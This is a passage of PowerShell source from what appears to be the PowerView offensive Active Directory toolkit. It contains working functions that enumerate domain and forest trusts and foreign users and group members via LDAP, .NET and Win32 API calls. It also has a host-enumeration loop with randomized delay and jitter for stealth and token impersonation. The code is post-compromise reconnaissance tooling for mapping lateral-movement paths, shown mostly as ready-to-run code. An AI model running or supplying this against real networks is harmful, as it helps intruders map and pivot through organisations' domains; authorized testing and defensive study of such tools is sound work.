Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainLocalGroupMember] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-DomainLocalGroupMember] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $GroupName, $Method, $LogonToken + } + } + else { + Write-Verbose "[Find-DomainLocalGroupMember] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'GroupName' = $GroupName + 'Method' = $Method + 'TokenHandle' = $LogonToken + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +######################################################## +# +# Domain trust functions below. +# +######################################################## + +function Get-DomainTrust { +<# +.SYNOPSIS + +Return all domain trusts for the current domain or a specified domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainSearcher, Get-DomainSID, PSReflect + +.DESCRIPTION + +This function will enumerate domain trust relationships for the current (or a remote) +domain using a number of methods. By default, and LDAP search using the filter +'(objectClass=trustedDomain)' is used- if any LDAP-appropriate parameters are specified +LDAP is used as well. If the -NET flag is specified, the .NET method +GetAllTrustRelationships() is used on the System.DirectoryServices.ActiveDirectory.Domain +object. If the -API flag is specified, the Win32 API DsEnumerateDomainTrusts() call is +used to enumerate instead. + +.PARAMETER Domain + +Specifies the domain to query for trusts, defaults to the current domain. + +.PARAMETER API + +Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in +.NET methods. + +.PARAMETER NET + +Switch. Use .NET queries to enumerate trusts instead of the default LDAP method. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainTrust + +Return domain trusts for the current domain using built in .LDAP methods. + +.EXAMPLE + +Get-DomainTrust -NET -Domain "prod.testlab.local" + +Return domain trusts for the "prod.testlab.local" domain using .NET methods + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainTrust -Domain "prod.testlab.local" -Server "PRIMARY.testlab.local" -Credential $Cred + +Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP +queries, binding to the PRIMARY.testlab.local server for queries, and using the specified +alternate credenitals. + +.EXAMPLE + +Get-DomainTrust -API -Domain "prod.testlab.local" + +Return domain trusts for the "prod.testlab.local" domain enumerated through API calls. + +.OUTPUTS + +PowerView.DomainTrust.LDAP + +Custom PSObject with translated domain LDAP trust result fields (default). + +PowerView.DomainTrust.NET + +A TrustRelationshipInformationCollection returned when using .NET methods. + +PowerView.DomainTrust.API + +Custom PSObject with translated domain API trust result fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DomainTrust.NET')] + [OutputType('PowerView.DomainTrust.LDAP')] + [OutputType('PowerView.DomainTrust.API')] + [CmdletBinding(DefaultParameterSetName = 'LDAP')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Parameter(ParameterSetName = 'API')] + [Switch] + $API, + + [Parameter(ParameterSetName = 'NET')] + [Switch] + $NET, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [Parameter(ParameterSetName = 'LDAP')] + [Parameter(ParameterSetName = 'API')] + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Parameter(ParameterSetName = 'LDAP')] + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Parameter(ParameterSetName = 'LDAP')] + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $TrustAttributes = @{ + [uint32]'0x00000001' = 'NON_TRANSITIVE' + [uint32]'0x00000002' = 'UPLEVEL_ONLY' + [uint32]'0x00000004' = 'FILTER_SIDS' + [uint32]'0x00000008' = 'FOREST_TRANSITIVE' + [uint32]'0x00000010' = 'CROSS_ORGANIZATION' + [uint32]'0x00000020' = 'WITHIN_FOREST' + [uint32]'0x00000040' = 'TREAT_AS_EXTERNAL' + [uint32]'0x00000080' = 'TRUST_USES_RC4_ENCRYPTION' + [uint32]'0x00000100' = 'TRUST_USES_AES_KEYS' + [uint32]'0x00000200' = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION' + [uint32]'0x00000400' = 'PIM_TRUST' + } + + $LdapSearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $LdapSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $LdapSearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['Properties']) { $LdapSearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $LdapSearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $LdapSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $LdapSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $LdapSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $LdapSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $LdapSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $LdapSearcherArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PsCmdlet.ParameterSetName -ne 'API') { + $NetSearcherArguments = @{} + if ($Domain -and $Domain.Trim() -ne '') { + $SourceDomain = $Domain + } + else { + if ($PSBoundParameters['Credential']) { + $SourceDomain = (Get-Domain -Credential $Credential).Name + } + else { + $SourceDomain = (Get-Domain).Name + } + } + } + elseif ($PsCmdlet.ParameterSetName -ne 'NET') { + if ($Domain -and $Domain.Trim() -ne '') { + $SourceDomain = $Domain + } + else { + $SourceDomain = $Env:USERDNSDOMAIN + } + } + + if ($PsCmdlet.ParameterSetName -eq 'LDAP') { + # if we're searching for domain trusts through LDAP/ADSI + $TrustSearcher = Get-DomainSearcher @LdapSearcherArguments + $SourceSID = Get-DomainSID @NetSearcherArguments + + if ($TrustSearcher) { + + $TrustSearcher.Filter = '(objectClass=trustedDomain)' + + if ($PSBoundParameters['FindOne']) { $Results = $TrustSearcher.FindOne() } + else { $Results = $TrustSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + $Props = $_.Properties + $DomainTrust = New-Object PSObject + + $TrustAttrib = @() + $TrustAttrib += $TrustAttributes.Keys | Where-Object { $Props.trustattributes[0] -band $_ } | ForEach-Object { $TrustAttributes[$_] } + + $Direction = Switch ($Props.trustdirection) { + 0 { 'Disabled' } + 1 { 'Inbound' } + 2 { 'Outbound' } + 3 { 'Bidirectional' } + } + + $TrustType = Switch ($Props.trusttype) { + 1 { 'WINDOWS_NON_ACTIVE_DIRECTORY' } + 2 { 'WINDOWS_ACTIVE_DIRECTORY' } + 3 { 'MIT' } + } + + $Distinguishedname = $Props.distinguishedname[0] + $SourceNameIndex = $Distinguishedname.IndexOf('DC=') + if ($SourceNameIndex) { + $SourceDomain = $($Distinguishedname.SubString($SourceNameIndex)) -replace 'DC=','' -replace ',','.' + } + else { + $SourceDomain = "" + } + + $TargetNameIndex = $Distinguishedname.IndexOf(',CN=System') + if ($SourceNameIndex) { + $TargetDomain = $Distinguishedname.SubString(3, $TargetNameIndex-3) + } + else { + $TargetDomain = "" + } + + $ObjectGuid = New-Object Guid @(,$Props.objectguid[0]) + $TargetSID = (New-Object System.Security.Principal.SecurityIdentifier($Props.securityidentifier[0],0)).Value + + $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain + $DomainTrust | Add-Member Noteproperty 'TargetName' $Props.name[0] + # $DomainTrust | Add-Member Noteproperty 'TargetGuid' "{$ObjectGuid}" + $DomainTrust | Add-Member Noteproperty 'TrustType' $TrustType + $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $($TrustAttrib -join ',') + $DomainTrust | Add-Member Noteproperty 'TrustDirection' "$Direction" + $DomainTrust | Add-Member Noteproperty 'WhenCreated' $Props.whencreated[0] + $DomainTrust | Add-Member Noteproperty 'WhenChanged' $Props.whenchanged[0] + $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.LDAP') + $DomainTrust + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainTrust] Error disposing of the Results object: $_" + } + } + $TrustSearcher.dispose() + } + } + elseif ($PsCmdlet.ParameterSetName -eq 'API') { + # if we're searching for domain trusts through Win32 API functions + if ($PSBoundParameters['Server']) { + $TargetDC = $Server + } + elseif ($Domain -and $Domain.Trim() -ne '') { + $TargetDC = $Domain + } + else { + # see https://msdn.microsoft.com/en-us/library/ms675976(v=vs.85).aspx for default NULL behavior + $TargetDC = $Null + } + + # arguments for DsEnumerateDomainTrusts + $PtrInfo = [IntPtr]::Zero + + # 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND + $Flags = 63 + $DomainCount = 0 + + # get the trust information from the target server + $Result = $Netapi32::DsEnumerateDomainTrusts($TargetDC, $Flags, [ref]$PtrInfo, [ref]$DomainCount) + + # Locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # Work out how much to increment the pointer by finding out the size of the structure + $Increment = $DS_DOMAIN_TRUSTS::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $DomainCount); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS + + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + + $SidString = '' + $Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if ($Result -eq 0) { + Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } + else { + $DomainTrust = New-Object PSObject + $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain + $DomainTrust | Add-Member Noteproperty 'TargetName' $Info.DnsDomainName + $DomainTrust | Add-Member Noteproperty 'TargetNetbiosName' $Info.NetbiosDomainName + $DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags + $DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex + $DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType + $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes + $DomainTrust | Add-Member Noteproperty 'TargetSid' $SidString + $DomainTrust | Add-Member Noteproperty 'TargetGuid' $Info.DomainGuid + $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.API') + $DomainTrust + } + } + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + else { + # if we're searching for domain trusts through .NET methods + $FoundDomain = Get-Domain @NetSearcherArguments + if ($FoundDomain) { + $FoundDomain.GetAllTrustRelationships() | ForEach-Object { + $_.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.NET') + $_ + } + } + } + } +} + + +function Get-ForestTrust { +<# +.SYNOPSIS + +Return all forest trusts for the current forest or a specified forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +.DESCRIPTION + +This function will enumerate domain trust relationships for the current (or a remote) +forest using number of method using the .NET method GetAllTrustRelationships() on a +System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest. + +.PARAMETER Forest + +Specifies the forest to query for trusts, defaults to the current forest. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-ForestTrust + +Return current forest trusts. + +.EXAMPLE + +Get-ForestTrust -Forest "external.local" + +Return trusts for the "external.local" forest. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestTrust -Forest "external.local" -Credential $Cred + +Return trusts for the "external.local" forest using the specified alternate credenitals. + +.OUTPUTS + +PowerView.DomainTrust.NET + +A TrustRelationshipInformationCollection returned when using .NET methods (default). +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ForestTrust.NET')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Forest, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $NetForestArguments = @{} + if ($PSBoundParameters['Forest']) { $NetForestArguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $NetForestArguments['Credential'] = $Credential } + + $FoundForest = Get-Forest @NetForestArguments + + if ($FoundForest) { + $FoundForest.GetAllTrustRelationships() | ForEach-Object { + $_.PSObject.TypeNames.Insert(0, 'PowerView.ForestTrust.NET') + $_ + } + } + } +} + + +function Get-DomainForeignUser { +<# +.SYNOPSIS + +Enumerates users who are in groups outside of the user's domain. +This is a domain's "outgoing" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser + +.DESCRIPTION + +Uses Get-DomainUser to enumerate all users for the current (or target) domain, +then calculates the given user's domain name based on the user's distinguishedName. +This domain name is compared to the queried domain, and the user object is +output if they differ. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainForeignUser + +Return all users in the current domain who are in groups not in the +current domain. + +.EXAMPLE + +Get-DomainForeignUser -Domain dev.testlab.local + +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred + +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and +using the specified alternate credentials. + +.OUTPUTS + +PowerView.ForeignUser + +Custom PSObject with translated user property fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ForeignUser')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{} + $SearcherArguments['LDAPFilter'] = '(memberof=*)' + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw } + } + + PROCESS { + Get-DomainUser @SearcherArguments | ForEach-Object { + ForEach ($Membership in $_.memberof) { + $Index = $Membership.IndexOf('DC=') + if ($Index) { + + $GroupDomain = $($Membership.SubString($Index)) -replace 'DC=','' -replace ',','.' + $UserDistinguishedName = $_.distinguishedname + $UserIndex = $UserDistinguishedName.IndexOf('DC=') + $UserDomain = $($_.distinguishedname.SubString($UserIndex)) -replace 'DC=','' -replace ',','.' + + if ($GroupDomain -ne $UserDomain) { + # if the group domain doesn't match the user domain, display it + $GroupName = $Membership.Split(',')[0].split('=')[1] + $ForeignUser = New-Object PSObject + $ForeignUser | Add-Member Noteproperty 'UserDomain' $UserDomain + $ForeignUser | Add-Member Noteproperty 'UserName' $_.samaccountname + $ForeignUser | Add-Member Noteproperty 'UserDistinguishedName' $_.distinguishedname + $ForeignUser | Add-Member Noteproperty 'GroupDomain' $GroupDomain + $ForeignUser | Add-Member Noteproperty 'GroupName' $GroupName + $ForeignUser | Add-Member Noteproperty 'GroupDistinguishedName' $Membership + $ForeignUser.PSObject.TypeNames.Insert(0, 'PowerView.ForeignUser') + $ForeignUser + } + } + } + } + } +} + + +function Get-DomainForeignGroupMember { +<# +.SYNOPSIS + +Enumerates groups with users outside of the group's domain and returns +each foreign member. This is a domain's "incoming" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainGroup + +.DESCRIPTION + +Uses Get-DomainGroup to enumerate all groups for the current (or target) domain, +then enumerates the members of each group, and compares the member's domain +name to the parent group's domain name, outputting the member if the domains differ. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainForeignGroupMember + +Return all group members in the current domain where the group and member differ. + +.EXAMPLE + +Get-DomainForeignGroupMember -Domain dev.testlab.local + +Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred + +Return all group members in the dev.testlab.local domain where the member is +not in dev.testlab.local. binding to the secondary.dev.testlab.local for +queries, and using the specified alternate credentials. + +.OUTPUTS + +PowerView.ForeignGroupMember + +Custom PSObject with translated group member property fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ForeignGroupMember')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{} + $SearcherArguments['LDAPFilter'] = '(member=*)' + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw } + } + + PROCESS { + # standard group names to ignore + $ExcludeGroups = @('Users', 'Domain Users', 'Guests') + + Get-DomainGroup @SearcherArguments | Where-Object { $ExcludeGroups -notcontains $_.samaccountname } | ForEach-Object { + $GroupName = $_.samAccountName + $GroupDistinguishedName = $_.distinguishedname + $GroupDomain = $GroupDistinguishedName.SubString($GroupDistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + + $_.member | ForEach-Object { + # filter for foreign SIDs in the cn field for users in another domain, + # or if the DN doesn't end with the proper DN for the queried domain + $MemberDomain = $_.SubString($_.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + if (($_ -match 'CN=S-1-5-21.*-.*') -or ($GroupDomain -ne $MemberDomain)) { + $MemberDistinguishedName = $_ + $MemberName = $_.Split(',')[0].split('=')[1] + + $ForeignGroupMember = New-Object PSObject + $ForeignGroupMember | Add-Member Noteproperty 'GroupDomain' $GroupDomain + $ForeignGroupMember | Add-Member Noteproperty 'GroupName' $GroupName + $ForeignGroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupDistinguishedName + $ForeignGroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain + $ForeignGroupMember | Add-Member Noteproperty 'MemberName' $MemberName + $ForeignGroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDistinguishedName + $ForeignGroupMember.PSObject.TypeNames.Insert(0, 'PowerView.ForeignGroupMember') + $ForeignGroupMember + } + } + } + } +} + + +function Get-DomainTrustMapping { +<# +.SYNOPSIS + +This function enumerates all trusts for the current domain and then enumerates +all trusts for each domain it finds. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainTrust, Get-ForestTrust + +.DESCRIPTION + +This function will enumerate domain trust relationships for the current domain using +a number of methods, and then enumerates all trusts for each found domain, recursively +mapping all reachable trust relationships. By default, and LDAP search using the filter +'(objectClass=trustedDomain)' is used- if any LDAP-appropriate parameters are specified +LDAP is used as well. If the -NET flag is specified, the .NET method +GetAllTrustRelationships() is used on the System.DirectoryServices.ActiveDirectory.Domain +object. If the -API flag is specified, the Win32 API DsEnumerateDomainTrusts() call is +used to enumerate instead. If any + +.PARAMETER API + +Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the +built-in LDAP method. + +.PARAMETER NET + +Switch. Use .NET queries to enumerate trusts instead of the default LDAP method. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainTrustMapping | Export-CSV -NoTypeInformation trusts.csv + +Map all reachable domain trusts using .NET methods and output everything to a .csv file. + +.EXAMPLE + +Get-DomainTrustMapping -API | Export-CSV -NoTypeInformation trusts.csv + +Map all reachable domain trusts using Win32 API calls and output everything to a .csv file. + +.EXAMPLE + +Get-DomainTrustMapping -NET | Export-CSV -NoTypeInformation trusts.csv + +Map all reachable domain trusts using .NET methods and output everything to a .csv file. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainTrustMapping -Server 'PRIMARY.testlab.local' | Export-CSV -NoTypeInformation trusts.csv + +Map all reachable domain trusts using LDAP, binding to the PRIMARY.testlab.local server for queries +using the specified alternate credentials, and output everything to a .csv file. + +.OUTPUTS + +PowerView.DomainTrust.LDAP + +Custom PSObject with translated domain LDAP trust result fields (default). + +PowerView.DomainTrust.NET + +A 